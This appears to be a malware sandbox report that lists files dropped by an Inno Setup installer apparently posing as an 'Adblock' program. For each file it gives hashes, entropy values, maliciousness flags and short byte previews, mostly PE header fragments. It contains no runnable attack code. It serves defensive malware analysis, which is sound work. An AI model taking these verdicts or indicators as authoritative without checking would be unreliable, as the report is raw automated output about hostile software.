                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3663232
                                                                                                                                                                                                                                Entropy (8bit):6.45134950449559
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:zYlX04QToato9J/WBFiBnntDPvZiIAVtwggMWh7DgSapCE9d1ng9FOnbNFSvVPE4:G75t8Ng/pYLngnJ6gPvZ
                                                                                                                                                                                                                                MD5:9A00D1D190C8D2F96A63F85EFB3B6BD7
                                                                                                                                                                                                                                SHA1:7919FE3EF84F6F71647093732A31A494136E96B4
                                                                                                                                                                                                                                SHA-256:2AE72C5C7569BFC3729606ECF23D43A70AC5448F683128C08263410F788B4CD9
                                                                                                                                                                                                                                SHA-512:13BF806A1DAE7A8DE2407ABAF5562D3F18A2F02D2508F80E500406B6322723DCECFCF202C05B1293045575A10C1C7A2B67E567AAA9102E66620158C794E5D38C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........e............|x....q....q....q....q....k.....l....q...q....l.......Y..q.x..q....q.......|....q....Rich...........PE..d...G..a.........." ......$...;.....tt#.......................................`.....F.8...`...........................................3.,.....3.0....@`.X....P^.H.....7../...P`..~..x.0.T.....................0.(.....0.8.............%..............................text.....$.......$................. ..`.rdata...1....%..2....$.............@..@.data.....*..@4..6....4.............@....pdata..H....P^......N5.............@..@.rsrc...X....@`......07.............@..@.reloc...~...P`......67.............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3262336
                                                                                                                                                                                                                                Entropy (8bit):6.688279260491484
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:UGtlqLWVwASOETIU6ifs3LWT6aQGsXXX17FM1z5WoIkMWrcYemDzrmP8sjEQ:y8+UbAcNwMGemHrnsj5
                                                                                                                                                                                                                                MD5:5E9AC76C468BB38FFDFCF4A8FA0AD8C9
                                                                                                                                                                                                                                SHA1:002603E931CDEBB3751A3D94C00E65DD2371DD8F
                                                                                                                                                                                                                                SHA-256:B3F88F7C6E1C98CD8F91EBBF528CB5C6DD43DF7E38AD4354EA75E9389EB7FA1C
                                                                                                                                                                                                                                SHA-512:7AB5F32A03854C4AED98F95D8708393B7B089DAFB38627F56F12257207FC2AB0F41C9C2BCA54E45097845F1D7304BB8C83D305A6BF86AD9078AA9D38E2347DDF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........U!}Z4O.Z4O.Z4O.SL..B4O..AK/P4O..AL/^4O..AJ/y4O..AN/\4O.<[..S4O.Z4O.F4O..AK/c6O..FK/84O..FJ/[4O.N_I/[4O.N_N/I4O.Z4N..6O..AK/X4O..AJ/v4O..A..[4O.Z4..[4O..AM/[4O.RichZ4O.........................PE..d....>.b..........".......#...........#........@............................. 4......N2...`.................................................T.........3.8.... 2.pp....1../....3.$j..H.,.T.....................,.(.....,.8.............#..............................text...#.#.......#................. ..`.rdata...U....#..V....#.............@..@.data........@/......$/.............@....pdata..pp... 2..r..../.............@..@.rsrc...8.....3......&1.............@..@.reloc..$j....3..l...,1.............@..B................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2417536
                                                                                                                                                                                                                                Entropy (8bit):6.366642119336498
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:OH8QFfUXSCGWF5VXZXxPwp5ZvksudhrwOf65IAo8q:6jBCj57hPwHisuko8q
                                                                                                                                                                                                                                MD5:DC301B230DB0B280502F7664EF36D979
                                                                                                                                                                                                                                SHA1:DC5DD76AE2B099EDA3DFE42412FF1F7707614254
                                                                                                                                                                                                                                SHA-256:D4BF5352011FCE73574618D067B5BBBECBEF135D0CAF4DE5161DFF8462623A60
                                                                                                                                                                                                                                SHA-512:26FCC52C6AD1E4DCA774127F5DC2C228169CEA1EB024FE2E096FC033F8426496C4447EAB63C6271620259FF929C7A35998B11396AE596A64F1E1BD87C27CE1F6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].GE..)...)...)..x....)..x....)..x....).K.*...).K.,.".).K.-.9.).......).......).......)...(...)... ...)...)...).......)......)...+...).Rich..).........PE..d....h.].........." ..........................................................%.......$...`.........................................0..........,.... "...... !.h.....$../....$.H.......T...........................@................................................text...H........................... ..`.rdata..............................@..@.data....E..........................@....pdata..h.... !......V .............@..@.rsrc........ "......T!.............@..@.reloc..H.....$.......$.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5818752
                                                                                                                                                                                                                                Entropy (8bit):6.865404504699206
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ok+70PQpwDyrB0c2m2PkosZk/jKre0yzHJ1JZWTS:fW0PQyOrh+KrCDJ1f
                                                                                                                                                                                                                                MD5:E0A6B273C481E7F046BE45457166927F
                                                                                                                                                                                                                                SHA1:4FE433957A243DF328C194D365FEB3EFE56E080C
                                                                                                                                                                                                                                SHA-256:D9FE4AC404D4F610F0A94D78F4968005F7C5AB9718199D37ADA3BE5DB50E8CFB
                                                                                                                                                                                                                                SHA-512:1C239D20DD9F6B6A2C96D332E7658C4D9B12B6E1E1153BFB04B5BCF101FE91F4DF28FA9C4801AD4FA5843A77F3FA99419B0C99A0C4AE5E5B6E76AC0777EB9C2A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...................................`...........!..L.!This program cannot be run in DOS mode....$........;.GZ..GZ..GZ..N".._Z.../..MZ.../..CZ.../..AZ..!5}.NZ..S1..CZ..S1..EZ.../..hZ...3..EZ.../..FZ.../..lZ.../..FZ..GZ..[Z.../...X...(..%Z.../..EZ..S1..fZ..GZ..UY...(..FZ.../...Z.../..FZ..GZ..FZ.../..FZ..RichGZ..................PE..d....>.b.........."......~,..h,.....P.+........@............................. Y..... .X...`.................................................8S9.......<.......:.P.....X../....X.\p..d.6.T.....................6.(.....6.8.............,.(............................text....},......~,................. ..`.rdata..>&....,..(....,.............@..@.data...x.....9.......9.............@....pdata..P.....:......h:.............@..@CPADinfo8.....<......8<.............@....rsrc.........<......:<.............@..@.reloc..\p....X..r...(X.............@..B........................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):29278080
                                                                                                                                                                                                                                Entropy (8bit):5.89888763105275
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:xR0KDcKMMk72vv6wHMHYqUpXAzs0kPEIp9UCaMsxxK5oXsuHMBc6MC1CdsCMXCcn:QKBHMHYPZ/E29UIyk
                                                                                                                                                                                                                                MD5:8E5E999C35698D8387A733DE759F07A5
                                                                                                                                                                                                                                SHA1:070290F7F0A0D3D16A39F3FA0543A12D6953E3BF
                                                                                                                                                                                                                                SHA-256:3D4184EF0996C9EC04021F8BA6FF5F7C27B096D31951575E952DA63BD15491E1
                                                                                                                                                                                                                                SHA-512:675A03430816679324A02A710269FFF23B2E60F1093708A2362CBD88330BDEE141B2537F46228271E55F99A4B980D830C461CD99B2A6163EA8BC4CC1076818AB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......... .wss.wss.wss...s.wss..wr.wss..pr.wss..vr.wss..rr.wss.s.wss|.rr.wss.s.wss...s.wss.wrslvss.s.wss].wr.wss].vr.wssd.vr.wssd.zr.wssd.sr.wssd..s.wss.w.s.wssd.qr.wssRich.wss........................PE..d....q._.........." ...............h...................................................`.........................................`...t.......T......(........?......./.....4....%..p...................0'..(...0&..................p............................text............................... ..`.rdata...\.......^..................@..@.data....G...@..."...2..............@....pdata...?.......@...T..............@..@.nv_fatb..........................@....nvFatBi.............|..............@....rsrc...(...........~..............@..@.reloc..4..........................@..B........................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1012608
                                                                                                                                                                                                                                Entropy (8bit):6.449078160348241
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:9gVfxCIGEvc9iDM/n+h7YKMEw+WobpLe2DF+0axh:wfkIVc98O+HDdlch
                                                                                                                                                                                                                                MD5:F252EC984A4101C1D6E54C66467A4513
                                                                                                                                                                                                                                SHA1:EAC5ED1F80FEAB9173939C35CF6336D5E2D5CF23
                                                                                                                                                                                                                                SHA-256:843F614089A543857DC5B19E866983DB322C26857D1AEE49A3E0B56B2827E6C1
                                                                                                                                                                                                                                SHA-512:B4467AC983AB1711EC0D2D598CDDFFAA821B52E956142B240A9D0DC94274DB007C28067D08E66035397D4536AE81FC5F25779846FCD043153B1D53AB91A14325
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................J/b.....D....E.J....z......!.....pn.......C.....E......y......~......{....Rich...................PE..d...".._.........." .....0....0.....x'.......................................@<.....T.....`..........................................3..M$..PW..x.....<......`;......D.../... <.,...................................0j..p............@...............................text..../.......0.................. ..`.rdata...$...@...&...4..............@..@.data.....,..p...,...Z..............@....pdata.......`;.....................@..@.rsrc.........<......*..............@..@.reloc..,.... <.....................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4443520
                                                                                                                                                                                                                                Entropy (8bit):5.657003585018005
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:jTOSa9v4YPz6C4B6D83iGxZJgfABQm8202Sbr:Q473Gz
                                                                                                                                                                                                                                MD5:A29A132D82E6905FADDB6A1A29B85E5B
                                                                                                                                                                                                                                SHA1:F16F932705857739471E75FF836F9D5B5954B33E
                                                                                                                                                                                                                                SHA-256:02ABD4AAF3653DCE2C9486241812E31E1CDA1AE7A13FDD211402B3951C63B293
                                                                                                                                                                                                                                SHA-512:29B5B21CC6B202FB5D535B6C77D77BDFB8A633E72F35EA717C298B02BA19211CE2BB14CEE5974DB3270594FB6CDB7E21528D9F4247D25C5538C12CF97867B43D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,Y.uB..uB..uB......uB..uC..uB......uB......uB......uB....uB....uB....uB.Rich.uB.........................PE..d......[.........." .....p...LC...............................................C......cD...`..........................................~C.p....wC.(.............C.t.....C../....C.....................................@pC.p............................................text....o.......p.................. ..`.rdata....B.......C..t..............@..@.data....5....C......tC.............@....pdata..t.....C.......C.............@..@.reloc........C.......C.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):15655808
                                                                                                                                                                                                                                Entropy (8bit):6.686367384579656
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:uQxPPanEiawYfXOhiLF9T+v4lX2KufhD0bJBFR8DTDm:uCPCnEiawYPOYj+v4lX2KufhD0bzUXm
                                                                                                                                                                                                                                MD5:62F0BE8BB4858B91ECACF82F72F2B3B0
                                                                                                                                                                                                                                SHA1:EBDFEB40AC0565CE6D2FA893557FFCDEF76EE5FC
                                                                                                                                                                                                                                SHA-256:5F1783D8E15EB76ED15C27C946102CDBAF1CE2650F6A1CCCEC3F86D00B65DC5D
                                                                                                                                                                                                                                SHA-512:AE1335B1E596600359AAB2F248A3B1816D43595D745A77BAAF75B7AF9B6AAA835F3ED45574DDBD729F9B12033F2EBACBF891947CC96246770D6816A528EC4688
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................nSr...-.~.....X..............0.c.....c.....c.....K.....K.....K.....K.J...K.....Rich..........PE..d......[.........." .........W.....L.7.............................................@.....`..........................................n..x...Xp..d......................../... ..................................(......................8............................text............................. ..`.rdata....>......>.................@..@.data...$............p..............@....pdata..............................@..@.tls................................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):59422
                                                                                                                                                                                                                                Entropy (8bit):3.94587993168113
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:83F38708C94E74D9026C9B6D1F5F16D2
                                                                                                                                                                                                                                SHA1:E0F19E92A8F730A79710036B2D3D2357C9970395
                                                                                                                                                                                                                                SHA-256:60A9FD385AF19F7028D72E793EBD02798B7BB3F84274C996F0DB95FF7E68BDE2
                                                                                                                                                                                                                                SHA-512:B79FD2FDC0DC1EC6C388DC157421B90F19898F78A6058C582339FD8B10701C82CE20FED51E8E20FA0307347FF8AB2DB3E374F7811011F815CC99005D7792DAC7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:Inno Setup Uninstall Log (b) 64-bit.............................{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}..........................................................................................Adblock.............................................................................................................................".......................................................................................................................J.w..........R4.......}........1.7.2.8.9.2......A.r.t.h.u.r......C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.P.r.o.g.r.a.m.s.\.A.d.b.l.o.c.k..................#.N.. ...........5..IFPS....D........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TLABEL....TLABEL..............................F....IDIS
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3134848
                                                                                                                                                                                                                                Entropy (8bit):6.373276623362357
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:64F68F0B5364A0313EF5C2EDE5FEAC47
                                                                                                                                                                                                                                SHA1:00AD3DAB6E7906BA79BA23EE43809430ED7901B4
                                                                                                                                                                                                                                SHA-256:25C367DA28A2E61834BBAEED1A594A0CA1E377A8C27215C9AD6AC5D97F671B8B
                                                                                                                                                                                                                                SHA-512:75586A619F9DC618652D62849C7DE840FAF83378ADBB78572A342807B2749628FD0BAAEA79E16124CAC5F82AA49BC9F77274AF039CD7D52885CC655235658DE1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,..h......`F,......P,...@...........................0.....i.0...@......@....................-......p-.29....-............../../....................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc........-.......-.............@..@..............1.......0.............@..@........................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):24135
                                                                                                                                                                                                                                Entropy (8bit):3.2752358191167734
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:53992F30D89AE09D9F64BD54436D0DCD
                                                                                                                                                                                                                                SHA1:5DB081393E38FBCB99B5E31347480AB2AE49F09F
                                                                                                                                                                                                                                SHA-256:83C14CB444EF68C443374CD02D09F812DBBFE30630B0805FFA8F5CD00457CEBB
                                                                                                                                                                                                                                SHA-512:400EAA5F139A8E5DC132FE87695BC5F12241E2C98226A3FF726050A8EA6D9ACC51B2A8FD60BA60308A75F1786D8A8F0669573D701DF532D9A85A401C47C1CCFD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:Inno Setup Messages (6.0.0) (u)......................................]......z..C.a.n.c.e.l. .i.n.s.t.a.l.l.a.t.i.o.n...S.e.l.e.c.t. .a.c.t.i.o.n...&.I.g.n.o.r.e. .t.h.e. .e.r.r.o.r. .a.n.d. .c.o.n.t.i.n.u.e...&.T.r.y. .a.g.a.i.n...&.A.b.o.u.t. .S.e.t.u.p.........%.1. .v.e.r.s.i.o.n. .%.2.....%.3.........%.1. .h.o.m.e. .p.a.g.e.:.....%.4.....A.b.o.u.t. .S.e.t.u.p...Y.o.u. .m.u.s.t. .b.e. .l.o.g.g.e.d. .i.n. .a.s. .a.n. .a.d.m.i.n.i.s.t.r.a.t.o.r. .w.h.e.n. .i.n.s.t.a.l.l.i.n.g. .t.h.i.s. .p.r.o.g.r.a.m.....T.h.e. .f.o.l.l.o.w.i.n.g. .a.p.p.l.i.c.a.t.i.o.n.s. .a.r.e. .u.s.i.n.g. .f.i.l.e.s. .t.h.a.t. .n.e.e.d. .t.o. .b.e. .u.p.d.a.t.e.d. .b.y. .S.e.t.u.p... .I.t. .i.s. .r.e.c.o.m.m.e.n.d.e.d. .t.h.a.t. .y.o.u. .a.l.l.o.w. .S.e.t.u.p. .t.o. .a.u.t.o.m.a.t.i.c.a.l.l.y. .c.l.o.s.e. .t.h.e.s.e. .a.p.p.l.i.c.a.t.i.o.n.s.....T.h.e. .f.o.l.l.o.w.i.n.g. .a.p.p.l.i.c.a.t.i.o.n.s. .a.r.e. .u.s.i.n.g. .f.i.l.e.s. .t.h.a.t. .n.e.e.d. .t.o. .b.e. .u.p.d.a.t.e.d. .b.y. .S.e.t.u.p... .I.t. .i.s. .r.e.
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):186752
                                                                                                                                                                                                                                Entropy (8bit):6.7007777360665415
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:912DD91AF5715A889CDBCAE92D7CF504
                                                                                                                                                                                                                                SHA1:521E3F78DEC4AAD475B23FA6DFDDA5CEC2515BFE
                                                                                                                                                                                                                                SHA-256:C66F31400961F68B58157B7C131F233CAEF8F5FC9175DD410ADF1D8055109659
                                                                                                                                                                                                                                SHA-512:132EADBDDCAA0B0CF397FFB7613F78F5EF3F345432A18FD798C7DEB4D6DFBF50C07D9D5C7AF3F482EE08135A61BD71F75FD4753B932E2899E9E527F2FA79FA37
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@0u.!^&.!^&.!^&.Y.&.!^&.T['.!^&.TZ'.!^&.T]'.!^&.T_'.!^&.I_'.!^&.!_&.!^&.T['.!^&.TZ'.!^&.T^'.!^&.T.&.!^&.!.&.!^&.T\'.!^&Rich.!^&................PE..d...#..a.........." .........................................................@............`.......................................................... ..(....... ......../...0.......S..T...........................PT..8............................................text............................... ..`.rdata..............................@..@.data....Q..........................@....pdata.. ...........................@..@.rsrc...(.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):18415
                                                                                                                                                                                                                                Entropy (8bit):4.043868285184243
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:2B063D92663595DFE4781AE687A03D86
                                                                                                                                                                                                                                SHA1:0FB582E756DBC751EA380593AC4DA27DDB4EBB06
                                                                                                                                                                                                                                SHA-256:44C76290F7A2E45940E8338912FEB49BCF4E071CFA85D2D34762857743ACBC8D
                                                                                                                                                                                                                                SHA-512:94C8FDA6173C7F5740F206190EDCD1F1F1C309596B710D400E23CD363A619D707A5D4576D4FE63AB7CB68947F009EFD29A1FBE04743A294698BF2AE17E92C214
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2015 - 2022 \f1\'88\'cc\'d0\'d0\'eb\'41\'b6\'ce\f0 \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fc\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a1\'a3\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2980
                                                                                                                                                                                                                                Entropy (8bit):6.163758160900388
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:472ABBEDCBAD24DBA5B5F5E8D02C340F
                                                                                                                                                                                                                                SHA1:974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
                                                                                                                                                                                                                                SHA-256:8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
                                                                                                                                                                                                                                SHA-512:676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ................. ......................../passive | /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13234
                                                                                                                                                                                                                                Entropy (8bit):5.125368352290407
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:E7DC9CA9474A13FA4529D91BCD2AB8CC
                                                                                                                                                                                                                                SHA1:511F5DE8A99C09EC3766C5E2494A79EACCA261C8
                                                                                                                                                                                                                                SHA-256:503C433DCDE2F3A9E7D388A5FF2B0612E7D8F90F5188D5B2B60228DB33044FDE
                                                                                                                                                                                                                                SHA-512:77108E53CD58E42F847D8EF23A07723C4849DC41DBE1C3EF939B9170E75F525BEC9D210D6C1FBFEB330ECE2E77B8A8E2808730D9E6F72F5B3FE626D58B6068C6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 LICEN\f1\'c8N\f0\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\f1\'c8NOSTI MICROSOFT\par..\f0 MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Tyto licen\f1\'e8n\f0\'ed podm\'ednky p\f1\'f8edstavuj\f0\'ed smlouvu mezi spole\f1\'e8nost\f0\'ed Microsoft Corporation (nebo n\f1\'eckterou z jej\f0\'edch afilac\'ed, v\~z\'e1vislosti na tom, kde bydl\'edte) a v\'e1mi. Vztahuj\'ed se na v\'fd\f1\'9ae uveden\f0\'fd software. Podm\'ednky se rovn\f1\'ec\'9e vztahuj\f0\'ed na jak\'e9koli slu\f1\'9eby Microsoft nebo aktualizace pro software, pokud se na slu\'9eby nebo aktualizace nevztahuj\f0\'ed odli\f1\'9an\f0\'e9 podm\'ednky.\par..\b DODR\f1\'8e\f0\'cdTE-LI
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3333
                                                                                                                                                                                                                                Entropy (8bit):5.370651462060085
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:16343005D29EC431891B02F048C7F581
                                                                                                                                                                                                                                SHA1:85A14C40C482D9351271F6119D272D19407C3CE9
                                                                                                                                                                                                                                SHA-256:07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
